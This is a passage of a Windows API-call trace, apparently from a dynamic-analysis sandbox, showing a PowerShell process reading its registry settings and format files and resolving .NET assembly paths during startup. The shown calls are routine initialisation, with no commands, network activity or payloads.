	[0751.443] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0751.443] CoTaskMemAlloc (cb=0x5a) returned 0x2c4cc0
	[0751.444] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2c4cc0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0751.444] CoTaskMemFree (pv=0x2c4cc0) 
	[0751.444] RegCloseKey (hKey=0x310) returned 0x0
	[0751.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.451] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x19c1920e, Data2=0x7a78, Data3=0x4744, Data4=([0]=0x81, [1]=0x90, [2]=0x9c, [3]=0x90, [4]=0x71, [5]=0x9c, [6]=0x55, [7]=0x25))) returned 0x0
	[0751.461] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7ec291ae, Data2=0x9555, Data3=0x46b1, Data4=([0]=0xbb, [1]=0x11, [2]=0xd7, [3]=0x53, [4]=0xc, [5]=0xf1, [6]=0x54, [7]=0x64))) returned 0x0
	[0751.462] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0751.463] GetFileType (hFile=0x310) returned 0x1
	[0751.463] SetErrorMode (uMode=0x1) returned 0x1
	[0751.463] GetFileType (hFile=0x310) returned 0x1
	[0751.463] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.464] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.464] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.465] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.465] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.467] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0xfb2, lpOverlapped=0x0) returned 1
	[0751.467] ReadFile (in: hFile=0x310, lpBuffer=0x33dbbb2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dbbb2*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0751.467] ReadFile (in: hFile=0x310, lpBuffer=0x33dc498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33dc498*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0751.468] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x310) returned 0x0
	[0751.468] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0751.468] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0751.468] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0751.468] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0751.468] RegCloseKey (hKey=0x310) returned 0x0
	[0751.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0751.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0752.844] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x76b3362, Data2=0x7061, Data3=0x4481, Data4=([0]=0xbc, [1]=0x62, [2]=0xe1, [3]=0x9c, [4]=0x35, [5]=0x7a, [6]=0xfb, [7]=0xf))) returned 0x0
	[0752.848] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5e068828, Data2=0xe389, Data3=0x4d6d, Data4=([0]=0xbb, [1]=0x26, [2]=0x65, [3]=0x99, [4]=0x47, [5]=0x96, [6]=0x8c, [7]=0x78))) returned 0x0
	[0752.849] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2b37f66c, Data2=0x391d, Data3=0x4b67, Data4=([0]=0xae, [1]=0x5, [2]=0x8d, [3]=0x7d, [4]=0x72, [5]=0x89, [6]=0x91, [7]=0x54))) returned 0x0
	[0752.849] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x40a7dce, Data2=0xb31b, Data3=0x47ca, Data4=([0]=0x9c, [1]=0x6, [2]=0x6e, [3]=0x93, [4]=0xa5, [5]=0x83, [6]=0xb6, [7]=0x3))) returned 0x0
	[0752.849] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3097f71c, Data2=0x714, Data3=0x4059, Data4=([0]=0xa2, [1]=0xb3, [2]=0xcd, [3]=0xce, [4]=0x4d, [5]=0x3a, [6]=0x14, [7]=0x74))) returned 0x0
	[0752.850] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xebf992ff, Data2=0x2388, Data3=0x44d3, Data4=([0]=0x81, [1]=0x9d, [2]=0xb0, [3]=0x4f, [4]=0x63, [5]=0xe4, [6]=0x1e, [7]=0x65))) returned 0x0
	[0752.850] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0752.850] GetFileType (hFile=0x2dc) returned 0x1
	[0752.850] SetErrorMode (uMode=0x1) returned 0x1
	[0752.850] GetFileType (hFile=0x2dc) returned 0x1
	[0752.853] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.854] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.854] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0xaca, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328bf82, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328bf82*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0752.855] ReadFile (in: hFile=0x2dc, lpBuffer=0x328c950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x328c950*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0752.856] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0752.856] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0752.856] CoTaskMemAlloc (cb=0x5a) returned 0x2d35c0
	[0752.856] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2d35c0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0752.856] CoTaskMemFree (pv=0x2d35c0) 
	[0752.856] RegCloseKey (hKey=0x2dc) returned 0x0
	[0752.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0752.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0752.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0752.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0752.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0752.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0752.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0752.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0752.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0754.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0754.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0754.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0754.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0754.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0754.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0754.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0754.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0754.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0754.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0754.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0754.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0755.293] VirtualQuery (in: lpAddress=0x16bf40, lpBuffer=0x16ce00, dwLength=0x30 | out: lpBuffer=0x16ce00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.294] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x90eec366, Data2=0x3145, Data3=0x4ae2, Data4=([0]=0xb4, [1]=0x48, [2]=0xdd, [3]=0x79, [4]=0xb6, [5]=0x6c, [6]=0x67, [7]=0xb7))) returned 0x0
	[0755.295] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2f59cd44, Data2=0x2e42, Data3=0x4ec8, Data4=([0]=0x98, [1]=0xe5, [2]=0xbd, [3]=0x93, [4]=0x6b, [5]=0xa4, [6]=0x8d, [7]=0xd0))) returned 0x0
	[0755.296] VirtualQuery (in: lpAddress=0x16c0f0, lpBuffer=0x16cfb0, dwLength=0x30 | out: lpBuffer=0x16cfb0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.296] VirtualQuery (in: lpAddress=0x16c0f0, lpBuffer=0x16cfb0, dwLength=0x30 | out: lpBuffer=0x16cfb0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.297] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x98d1724d, Data2=0x2b77, Data3=0x4bce, Data4=([0]=0xa5, [1]=0x9b, [2]=0x1, [3]=0x45, [4]=0x5, [5]=0x55, [6]=0xd9, [7]=0x98))) returned 0x0
	[0755.300] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd2557521, Data2=0x2a55, Data3=0x440c, Data4=([0]=0x93, [1]=0x82, [2]=0x37, [3]=0xf8, [4]=0xe6, [5]=0xbd, [6]=0xd4, [7]=0x80))) returned 0x0
	[0755.300] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbed9be55, Data2=0x9a84, Data3=0x4597, Data4=([0]=0xa5, [1]=0xa5, [2]=0x22, [3]=0xda, [4]=0xd4, [5]=0xc4, [6]=0xe9, [7]=0x2))) returned 0x0
	[0755.301] VirtualQuery (in: lpAddress=0x16b9b0, lpBuffer=0x16c870, dwLength=0x30 | out: lpBuffer=0x16c870*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.301] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2998430c, Data2=0x8939, Data3=0x41a2, Data4=([0]=0x91, [1]=0xb3, [2]=0xda, [3]=0x70, [4]=0xd5, [5]=0x7f, [6]=0x8d, [7]=0x60))) returned 0x0
	[0755.301] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc130ffab, Data2=0x5c5c, Data3=0x441a, Data4=([0]=0xa3, [1]=0x6c, [2]=0xc4, [3]=0x21, [4]=0x21, [5]=0xe7, [6]=0x2d, [7]=0x20))) returned 0x0
	[0755.302] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0755.302] GetFileType (hFile=0x2dc) returned 0x1
	[0755.302] SetErrorMode (uMode=0x1) returned 0x1
	[0755.302] GetFileType (hFile=0x2dc) returned 0x1
	[0755.302] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.303] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.303] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.303] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.304] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
